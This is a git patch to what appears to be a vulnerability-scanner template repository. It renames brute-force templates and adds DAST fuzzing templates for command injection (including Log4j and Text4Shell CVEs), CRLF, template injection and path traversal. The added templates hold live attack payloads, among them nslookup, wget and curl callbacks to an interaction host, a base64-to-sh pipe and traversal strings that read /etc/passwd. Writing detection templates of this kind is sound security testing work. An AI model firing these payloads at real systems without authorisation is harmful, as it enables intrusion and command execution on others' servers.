From fc79bf96b70faf94ea4f261bcada6f4dccffa1d3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 17 Mar 2024 00:14:49 +0530 Subject: [PATCH] Added fuzzing templates --- .nuclei-ignore | 4 +- config/bugbounty.yml | 2 +- config/pentest.yml | 2 +- config/recommended.yml | 2 +- .../{ => brute}/cache-poisoning-fuzz.yaml | 2 +- .../{ => brute}/header-command-injection.yaml | 2 +- http/fuzzing/{ => brute}/iis-shortname.yaml | 0 .../{ => brute}/linux-lfi-fuzzing.yaml | 2 +- .../{ => brute}/mdb-database-file.yaml | 0 .../{ => brute}/prestashop-module-fuzz.yaml | 4 +- http/fuzzing/{ => brute}/ssrf-via-proxy.yaml | 0 .../{ => brute}/valid-gmail-check.yaml | 2 +- http/fuzzing/{ => brute}/waf-fuzz.yaml | 3 +- .../{ => brute}/wordpress-plugins-detect.yaml | 3 +- .../{ => brute}/wordpress-themes-detect.yaml | 3 +- .../wordpress-weak-credentials.yaml | 2 +- http/fuzzing/{ => brute}/xff-403-bypass.yaml | 2 +- .../dast/cmdi/blind-oast-polyglots.yaml | 46 ++ .../dast/cmdi/cves/CVE-2018-19518.yaml | 41 ++ .../dast/cmdi/cves/CVE-2021-45046.yaml | 60 +++ .../dast/cmdi/cves/CVE-2022-42889.yaml | 65 +++ http/fuzzing/dast/cmdi/ruby-open-rce.yaml | 36 ++ http/fuzzing/dast/crlf/cookie-injection.yaml | 34 ++ http/fuzzing/dast/crlf/crlf-injection.yaml | 69 +++ ...ngular-client-side-template-injection.yaml | 39 ++ http/fuzzing/dast/lfi/lfi-keyed.yaml | 118 +++++ http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml | 78 +++ http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml | 71 +++ http/fuzzing/dast/redirect/open-redirect.yaml | 180 +++++++ http/fuzzing/dast/rfi/rfi.yaml | 31 ++ .../dast/sqli/cves/CVE-2022-34265.yaml | 45 ++ http/fuzzing/dast/sqli/error-based.yaml | 492 ++++++++++++++++++ http/fuzzing/dast/ssrf/blind-ssrf.yaml | 40 ++ http/fuzzing/dast/ssrf/response-ssrf.yaml | 127 +++++ http/fuzzing/dast/ssti/reflection-ssti.yaml | 51 ++ http/fuzzing/dast/xss/dom-xss.yaml | 45 ++ http/fuzzing/dast/xss/reflected-xss.yaml | 39 ++ http/fuzzing/dast/xxe/fuzz-xxe.yaml | 50 ++ http/vulnerabilities/generic/xss-fuzz.yaml | 87 ++-- 39 files changed, 1817 insertions(+), 62 deletions(-) rename http/fuzzing/{ => brute}/cache-poisoning-fuzz.yaml (96%) rename http/fuzzing/{ => brute}/header-command-injection.yaml (97%) rename http/fuzzing/{ => brute}/iis-shortname.yaml (100%) rename http/fuzzing/{ => brute}/linux-lfi-fuzzing.yaml (99%) rename http/fuzzing/{ => brute}/mdb-database-file.yaml (100%) rename http/fuzzing/{ => brute}/prestashop-module-fuzz.yaml (89%) rename http/fuzzing/{ => brute}/ssrf-via-proxy.yaml (100%) rename http/fuzzing/{ => brute}/valid-gmail-check.yaml (95%) rename http/fuzzing/{ => brute}/waf-fuzz.yaml (99%) rename http/fuzzing/{ => brute}/wordpress-plugins-detect.yaml (94%) rename http/fuzzing/{ => brute}/wordpress-themes-detect.yaml (84%) rename http/fuzzing/{ => brute}/wordpress-weak-credentials.yaml (99%) rename http/fuzzing/{ => brute}/xff-403-bypass.yaml (97%) create mode 100644 http/fuzzing/dast/cmdi/blind-oast-polyglots.yaml create mode 100644 http/fuzzing/dast/cmdi/cves/CVE-2018-19518.yaml create mode 100644 http/fuzzing/dast/cmdi/cves/CVE-2021-45046.yaml create mode 100644 http/fuzzing/dast/cmdi/cves/CVE-2022-42889.yaml create mode 100644 http/fuzzing/dast/cmdi/ruby-open-rce.yaml create mode 100644 http/fuzzing/dast/crlf/cookie-injection.yaml create mode 100644 http/fuzzing/dast/crlf/crlf-injection.yaml create mode 100644 http/fuzzing/dast/csti/angular-client-side-template-injection.yaml create mode 100644 http/fuzzing/dast/lfi/lfi-keyed.yaml create mode 100644 http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml create mode 100644 http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml create mode 100644 http/fuzzing/dast/redirect/open-redirect.yaml create mode 100644 http/fuzzing/dast/rfi/rfi.yaml create mode 100644 http/fuzzing/dast/sqli/cves/CVE-2022-34265.yaml create mode 100644 http/fuzzing/dast/sqli/error-based.yaml create mode 100644 http/fuzzing/dast/ssrf/blind-ssrf.yaml create mode 100644 http/fuzzing/dast/ssrf/response-ssrf.yaml create mode 100644 http/fuzzing/dast/ssti/reflection-ssti.yaml create mode 100644 http/fuzzing/dast/xss/dom-xss.yaml create mode 100644 http/fuzzing/dast/xss/reflected-xss.yaml create mode 100644 http/fuzzing/dast/xxe/fuzz-xxe.yaml diff --git a/.nuclei-ignore b/.nuclei-ignore index 4714e3b0df..760f8543d0 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -2,7 +2,7 @@ # ==================================== # # This is default list of tags and files to excluded from default nuclei scan. -# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion +# More details - https://docs.projectdiscovery.io/tools/nuclei/running#template-exclusion # # ============ DO NOT EDIT ============ # Automatically updated by nuclei on execution from nuclei-templates @@ -13,10 +13,8 @@ # unless asked for by the user. tags: - - "fuzz" - "dos" - "local" - - "brute-force" - "bruteforce" - "phishing" diff --git a/config/bugbounty.yml b/config/bugbounty.yml index b75b98dc83..5100e5a49f 100644 --- a/config/bugbounty.yml +++ b/config/bugbounty.yml @@ -20,7 +20,7 @@ type: exclude-tags: - tech - dos - - brute-force + - bruteforce - creds-stuffing - token-spray - osint \ No newline at end of file diff --git a/config/pentest.yml b/config/pentest.yml index dc2466e291..d99c2d14c8 100644 --- a/config/pentest.yml +++ b/config/pentest.yml @@ -15,5 +15,5 @@ type: exclude-tags: - dos - - brute-force + - bruteforce - osint \ No newline at end of file diff --git a/config/recommended.yml b/config/recommended.yml index c3b24db1a9..6cfb5778da 100644 --- a/config/recommended.yml +++ b/config/recommended.yml @@ -20,7 +20,7 @@ type: exclude-tags: - tech - dos - - brute-force + - bruteforce - creds-stuffing - token-spray - osint diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/brute/cache-poisoning-fuzz.yaml similarity index 96% rename from http/fuzzing/cache-poisoning-fuzz.yaml rename to http/fuzzing/brute/cache-poisoning-fuzz.yaml index f76d291382..74037ce125 100644 --- a/http/fuzzing/cache-poisoning-fuzz.yaml +++ b/http/fuzzing/brute/cache-poisoning-fuzz.yaml @@ -9,7 +9,7 @@ info: - https://portswigger.net/web-security/web-cache-poisoning metadata: max-request: 5834 - tags: fuzzing,bruteforce,cache + tags: bruteforce,cache http: - raw: diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/brute/header-command-injection.yaml similarity index 97% rename from http/fuzzing/header-command-injection.yaml rename to http/fuzzing/brute/header-command-injection.yaml index 550e7fbc9a..ab964c4821 100644 --- a/http/fuzzing/header-command-injection.yaml +++ b/http/fuzzing/brute/header-command-injection.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-77 metadata: max-request: 7650 - tags: fuzzing,bruteforce,rce + tags: bruteforce,rce http: - raw: diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/brute/iis-shortname.yaml similarity index 100% rename from http/fuzzing/iis-shortname.yaml rename to http/fuzzing/brute/iis-shortname.yaml diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/brute/linux-lfi-fuzzing.yaml similarity index 99% rename from http/fuzzing/linux-lfi-fuzzing.yaml rename to http/fuzzing/brute/linux-lfi-fuzzing.yaml index f313bfc151..163784b684 100644 --- a/http/fuzzing/linux-lfi-fuzzing.yaml +++ b/http/fuzzing/brute/linux-lfi-fuzzing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 22 - tags: fuzzing,linux,lfi,bruteforce + tags: linux,lfi,bruteforce http: - method: GET diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/brute/mdb-database-file.yaml similarity index 100% rename from http/fuzzing/mdb-database-file.yaml rename to http/fuzzing/brute/mdb-database-file.yaml diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/brute/prestashop-module-fuzz.yaml similarity index 89% rename from http/fuzzing/prestashop-module-fuzz.yaml rename to http/fuzzing/brute/prestashop-module-fuzz.yaml index d280c39b77..ba3a105064 100644 --- a/http/fuzzing/prestashop-module-fuzz.yaml +++ b/http/fuzzing/brute/prestashop-module-fuzz.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 639 - tags: fuzzing,bruteforce,prestashop + tags: bruteforce,prestashop http: - raw: @@ -20,8 +20,6 @@ http: payloads: path: helpers/wordlists/prestashop-modules.txt - threads: 50 - matchers-condition: and matchers: - type: word diff --git a/http/fuzzing/ssrf-via-proxy.yaml b/http/fuzzing/brute/ssrf-via-proxy.yaml similarity index 100% rename from http/fuzzing/ssrf-via-proxy.yaml rename to http/fuzzing/brute/ssrf-via-proxy.yaml diff --git a/http/fuzzing/valid-gmail-check.yaml b/http/fuzzing/brute/valid-gmail-check.yaml similarity index 95% rename from http/fuzzing/valid-gmail-check.yaml rename to http/fuzzing/brute/valid-gmail-check.yaml index 6d3a9fd0d6..cf50fbfbba 100644 --- a/http/fuzzing/valid-gmail-check.yaml +++ b/http/fuzzing/brute/valid-gmail-check.yaml @@ -8,7 +8,7 @@ info: - https://github.com/dievus/geeMailUserFinder metadata: max-request: 1 - tags: bruteforce,gmail + tags: gmail self-contained: true diff --git a/http/fuzzing/waf-fuzz.yaml b/http/fuzzing/brute/waf-fuzz.yaml similarity index 99% rename from http/fuzzing/waf-fuzz.yaml rename to http/fuzzing/brute/waf-fuzz.yaml index 392aa4cad0..d5e2ea23bf 100644 --- a/http/fuzzing/waf-fuzz.yaml +++ b/http/fuzzing/brute/waf-fuzz.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 58 - tags: fuzzing,waf,tech,bruteforce + tags: waf,bruteforce http: - raw: @@ -56,6 +56,7 @@ http: - SELECT * FROM information_schema.tables - SELECT user FROM information_schema.tables AND user = \'test user\'; - UNION SELECT * FROM users WHERE user = \'admin\'; + stop-at-first-match: true matchers: - type: regex diff --git a/http/fuzzing/wordpress-plugins-detect.yaml b/http/fuzzing/brute/wordpress-plugins-detect.yaml similarity index 94% rename from http/fuzzing/wordpress-plugins-detect.yaml rename to http/fuzzing/brute/wordpress-plugins-detect.yaml index ac4f0ded77..ddd8185157 100644 --- a/http/fuzzing/wordpress-plugins-detect.yaml +++ b/http/fuzzing/brute/wordpress-plugins-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 100563 - tags: fuzzing,bruteforce,wordpress + tags: bruteforce,wordpress http: - raw: @@ -14,7 +14,6 @@ http: GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} - threads: 50 payloads: pluginSlug: helpers/wordlists/wordpress-plugins.txt diff --git a/http/fuzzing/wordpress-themes-detect.yaml b/http/fuzzing/brute/wordpress-themes-detect.yaml similarity index 84% rename from http/fuzzing/wordpress-themes-detect.yaml rename to http/fuzzing/brute/wordpress-themes-detect.yaml index 3bb2f31ff5..ece60cfda8 100644 --- a/http/fuzzing/wordpress-themes-detect.yaml +++ b/http/fuzzing/brute/wordpress-themes-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 24434 - tags: bruteforce,wordpress,wp + tags: bruteforce,wordpress http: - raw: @@ -16,7 +16,6 @@ http: payloads: themeSlug: helpers/wordlists/wordpress-themes.txt - threads: 50 matchers-condition: and matchers: diff --git a/http/fuzzing/wordpress-weak-credentials.yaml b/http/fuzzing/brute/wordpress-weak-credentials.yaml similarity index 99% rename from http/fuzzing/wordpress-weak-credentials.yaml rename to http/fuzzing/brute/wordpress-weak-credentials.yaml index 55bff6004d..3321679286 100644 --- a/http/fuzzing/wordpress-weak-credentials.yaml +++ b/http/fuzzing/brute/wordpress-weak-credentials.yaml @@ -27,10 +27,10 @@ http: log={{users}}&pwd={{passwords}} + attack: clusterbomb payloads: users: helpers/wordlists/wp-users.txt passwords: helpers/wordlists/wp-passwords.txt - attack: clusterbomb stop-at-first-match: true matchers-condition: and diff --git a/http/fuzzing/xff-403-bypass.yaml b/http/fuzzing/brute/xff-403-bypass.yaml similarity index 97% rename from http/fuzzing/xff-403-bypass.yaml rename to http/fuzzing/brute/xff-403-bypass.yaml index 564e32ff7e..7396b0baf2 100644 --- a/http/fuzzing/xff-403-bypass.yaml +++ b/http/fuzzing/brute/xff-403-bypass.yaml @@ -7,7 +7,7 @@ info: description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. metadata: max-request: 3 - tags: fuzzing,bruteforce + tags: bruteforce http: - raw: diff --git a/http/fuzzing/dast/cmdi/blind-oast-polyglots.yaml b/http/fuzzing/dast/cmdi/blind-oast-polyglots.yaml new file mode 100644 index 0000000000..050a7d7450 --- /dev/null +++ b/http/fuzzing/dast/cmdi/blind-oast-polyglots.yaml @@ -0,0 +1,46 @@ +id: cmdi-blind-oast-polyglot + +info: + name: Blind OS Command Injection + author: pdteam,geeknik + severity: high + description: | + Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input. + Successful exploitation could lead to arbitrary command execution on the system. + reference: + - https://portswigger.net/research/hunting-asynchronous-vulnerabilities + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md + tags: cmdi,oast,dast,blind,polyglot,fuzz + +variables: + marker: "{{interactsh-url}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + interaction: + - "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'" + - "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}" + - "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/" + - "$(ping -c 1 {{marker}} | nslookup {{marker}} ; wget {{marker}} -O /dev/null)" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{interaction}}" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/http/fuzzing/dast/cmdi/cves/CVE-2018-19518.yaml b/http/fuzzing/dast/cmdi/cves/CVE-2018-19518.yaml new file mode 100644 index 0000000000..81033b7014 --- /dev/null +++ b/http/fuzzing/dast/cmdi/cves/CVE-2018-19518.yaml @@ -0,0 +1,41 @@ +id: CVE-2018-19518 + +info: + name: PHP imap - Remote Command Execution + author: princechaddha + severity: high + description: | + University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument. + reference: + - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19518 + - https://www.openwall.com/lists/oss-security/2018/11/22/3 + - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2018-19518 + cwe-id: CWE-88 + metadata: + confidence: tenative + tags: imap,dast,vulhub,cve,cve2018,rce,oast,php,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + php-imap: + - "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}" + + fuzzing: + - part: query + fuzz: + - "{{php-imap}}" + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" diff --git a/http/fuzzing/dast/cmdi/cves/CVE-2021-45046.yaml b/http/fuzzing/dast/cmdi/cves/CVE-2021-45046.yaml new file mode 100644 index 0000000000..72b25a4b71 --- /dev/null +++ b/http/fuzzing/dast/cmdi/cves/CVE-2021-45046.yaml @@ -0,0 +1,60 @@ +id: CVE-2021-45046 + +info: + name: Apache Log4j2 - Remote Code Injection + author: princechaddha + severity: critical + description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. + reference: + - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/ + - https://twitter.com/marcioalm/status/1471740771581652995 + - https://logging.apache.org/log4j/2.x/ + - http://www.openwall.com/lists/oss-security/2021/12/14/4 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9 + cve-id: CVE-2021-45046 + cwe-id: CWE-502 + metadata: + confidence: tenative + tags: cve,cve2021,rce,oast,log4j,injection,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + log4j: + - "${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}" + + fuzzing: + - part: query + fuzz: + - "{{log4j}}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + + extractors: + - type: regex + part: interactsh_request + group: 2 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/http/fuzzing/dast/cmdi/cves/CVE-2022-42889.yaml b/http/fuzzing/dast/cmdi/cves/CVE-2022-42889.yaml new file mode 100644 index 0000000000..b88ccb9305 --- /dev/null +++ b/http/fuzzing/dast/cmdi/cves/CVE-2022-42889.yaml @@ -0,0 +1,65 @@ +id: CVE-2022-42889 + +info: + name: Text4Shell - Remote Code Execution + author: mordavid,princechaddha + severity: critical + description: | + Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. + reference: + - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om + - http://www.openwall.com/lists/oss-security/2022/10/13/4 + - http://www.openwall.com/lists/oss-security/2022/10/18/1 + - https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/ + - https://github.com/silentsignal/burp-text4shell + remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-42889 + cwe-id: CWE-94 + metadata: + confidence: tenative + tags: cve,cve2022,rce,oast,text4shell,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + text4shell: + - "${url:UTF-8:https://{{Hostname}}.q.{{interactsh-url}}}" + + fuzzing: + - part: query + fuzz: + - "{{text4shell}}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + + - type: regex + part: interactsh_request + group: 1 + regex: diff --git a/http/fuzzing/dast/cmdi/ruby-open-rce.yaml b/http/fuzzing/dast/cmdi/ruby-open-rce.yaml new file mode 100644 index 0000000000..ef55b0cece --- /dev/null +++ b/http/fuzzing/dast/cmdi/ruby-open-rce.yaml @@ -0,0 +1,36 @@ +id: cmdi-ruby-open-rce + +info: + name: Ruby Kernel#open/URI.open RCE + author: pdteam + severity: high + description: | + Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. + reference: + - https://bishopfox.com/blog/ruby-vulnerabilities-exploits + - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/ + tags: cmdi,oast,dast,blind,ruby,rce,fuzz + +variables: + marker: "{{interactsh-url}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + stop-at-first-match: true + payloads: + interaction: + - "|nslookup {{marker}}|curl {{marker}}" + + fuzzing: + - part: query + fuzz: + - "{{interaction}}" + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" diff --git a/http/fuzzing/dast/crlf/cookie-injection.yaml b/http/fuzzing/dast/crlf/cookie-injection.yaml new file mode 100644 index 0000000000..96d4b28bf6 --- /dev/null +++ b/http/fuzzing/dast/crlf/cookie-injection.yaml @@ -0,0 +1,34 @@ +id: cookie-injection + +info: + name: Parameter based cookie injection + author: pdteam + severity: info + reference: + - https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/ + - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm + tags: reflected,dast,cookie,injection,fuzz + +variables: + first: "cookie_injection" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + reflection: + - "{{first}}" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{reflection}}" + + matchers: + - type: regex + part: header + regex: + - '(?m)(?i)(^set-cookie.*cookie_injection.*)' diff --git a/http/fuzzing/dast/crlf/crlf-injection.yaml b/http/fuzzing/dast/crlf/crlf-injection.yaml new file mode 100644 index 0000000000..d51916027c --- /dev/null +++ b/http/fuzzing/dast/crlf/crlf-injection.yaml @@ -0,0 +1,69 @@ +id: crlf-injection + +info: + name: CRLF Injection + author: pdteam + severity: low + tags: crlf,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + escape: + - "%00" + - "%0a" + - "%0a%20" + - "%0d" + - "%0d%09" + - "%0d%0a" + - "%0d%0a%09" + - "%0d%0a%20" + - "%0d%20" + - "%20" + - "%20%0a" + - "%20%0d" + - "%20%0d%0a" + - "%23%0a" + - "%23%0a%20" + - "%23%0d" + - "%23%0d%0a" + - "%23%oa" + - "%25%30" + - "%25%30%61" + - "%2e%2e%2f%0d%0a" + - "%2f%2e%2e%0d%0a" + - "%2f..%0d%0a" + - "%3f" + - "%3f%0a" + - "%3f%0d" + - "%3f%0d%0a" + - "%e5%98%8a%e5%98%8d" + - "%e5%98%8a%e5%98%8d%0a" + - "%e5%98%8a%e5%98%8d%0d" + - "%e5%98%8a%e5%98%8d%0d%0a" + - "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d" + - "%u0000" + - "%u000a" + - "%u000d" + - "\r" + - "\r%20" + - "\r\n" + - "\r\n%20" + - "\r\n\t" + - "\r\t" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{escape}}Set-Cookie:crlfinjection=crlfinjection" + + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' diff --git a/http/fuzzing/dast/csti/angular-client-side-template-injection.yaml b/http/fuzzing/dast/csti/angular-client-side-template-injection.yaml new file mode 100644 index 0000000000..d0ed3ea568 --- /dev/null +++ b/http/fuzzing/dast/csti/angular-client-side-template-injection.yaml @@ -0,0 +1,39 @@ +id: angular-client-side-template-injection + +info: + name: Angular Client-side-template-injection + author: theamanrawat + severity: high + reference: + - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/ + - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs + tags: angular,csti,dast,fuzz + +variables: + first: "{{rand_int(1000, 9999)}}" + second: "{{rand_int(1000, 9999)}}" + result: "{{to_number(first)*to_number(second)}}" + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + - action: waitload + + payloads: + payload: + - '{{concat("{{", "{{first}}*{{second}}", "}}")}}' + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{payload}}" + + matchers: + - type: word + part: body + words: + - "{{result}}" diff --git a/http/fuzzing/dast/lfi/lfi-keyed.yaml b/http/fuzzing/dast/lfi/lfi-keyed.yaml new file mode 100644 index 0000000000..494669e21b --- /dev/null +++ b/http/fuzzing/dast/lfi/lfi-keyed.yaml @@ -0,0 +1,118 @@ +id: lfi-keyed + +info: + name: Key LFI Detection + author: pwnhxl + severity: unknown + reference: + - https://owasp.org/www-community/attacks/Unicode_Encoding + tags: dast,pathtraversal,lfi,fuzz + +variables: + fuzz: "../../../../../../../../../../../../../../../" + fuzz_urlx2_encode: "%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f" + fuzz_hex_unicode: "%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f" + fuzz_utf8_unicode: "%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF" + fuzz_utf8_unicode_x: "%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF" + fuzz_bypass_replace: ".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../" + fuzz_bypass_replace_windows: '..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\' + fuzz_bypass_waf_regx: "./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + pathtraversal: + - '{{fuzz}}etc/passwd' + - '{{fuzz}}windows/win.ini' + - '/etc/passwd%00.jpg' + - 'c:/windows/win.ini%00.jpg' + - '{{fuzz}}etc/passwd%00.jpg' + - '{{fuzz}}windows/win.ini%00.jpg' + - '{{fuzz_urlx2_encode}}etc%252fpasswd' + - '{{fuzz_urlx2_encode}}windows%252fwin.ini' + - '{{fuzz_hex_unicode}}etc%u002fpasswd' + - '{{fuzz_hex_unicode}}windows%u002fwin.ini' + - '{{fuzz_utf8_unicode}}etc%C0%AFpasswd' + - '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini' + - '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd' + - '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini' + - '{{fuzz_bypass_replace}}etc/passwd' + - '{{fuzz_bypass_replace}}windows/win.ini' + - '{{fuzz_bypass_replace_windows}}windows\win.ini' + - '{{fuzz_bypass_waf_regx}}etc/passwd' + - '{{fuzz_bypass_waf_regx}}windows/win.ini' + - './web.config' + - '../web.config' + - '../../web.config' + - './WEB-INF/web.xml' + - '../WEB-INF/web.xml' + - '../../WEB-INF/web.xml' + + fuzzing: + - part: query + mode: single + keys: + - cat + - dir + - action + - board + - date + - detail + - file + - download + - path + - folder + - prefix + - include + - page + - inc + - locate + - show + - doc + - site + - type + - view + - content + - document + - layout + - mod + - conf + - url + - img + - image + - images + fuzz: + - "{{pathtraversal}}" + + - part: query + mode: single + values: + - 